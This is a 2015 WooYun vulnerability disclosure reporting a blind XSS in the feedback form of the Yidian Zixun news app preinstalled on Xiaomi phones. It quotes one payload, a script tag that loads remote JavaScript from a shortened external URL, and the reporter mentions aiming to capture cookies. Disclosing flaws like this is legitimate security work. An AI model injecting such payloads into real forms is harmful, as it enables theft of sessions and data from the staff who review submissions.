当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153108

漏洞标题:小米手机自带手机APP一点资讯某处XSS盲打

相关厂商:一点资讯

漏洞作者: js2012

提交时间:2015-11-09 18:49

修复时间:2015-12-24 18:50

公开时间:2015-12-24 18:50

漏洞类型:XSS 跨站脚本攻击

危害等级:中

自评Rank:5

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-09: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-12-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

用APP看新闻,看到有反馈界面就顺手来了一发,汗XSS平台还真过来了

详细说明:

XSS代码:

<script src=http://t.cn/RUUNjzh></script>


V{$4SH{0J0GX7F]827$E%EB.png


XSS平台接收到的:

RA[HEEP3$SU50)@3Q])~]H2.png

漏洞证明:

RA[HEEP3$SU50)@3Q])~]H2.png

修复方案:

还是过滤把,没打到cookie不知道是什么情况,打到的地址也不能访问,难道是哦内网的东西,不过可以肯定的是漏洞一定是存在的,看着给点RANK把

版权声明:转载请注明来源 js2012@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评价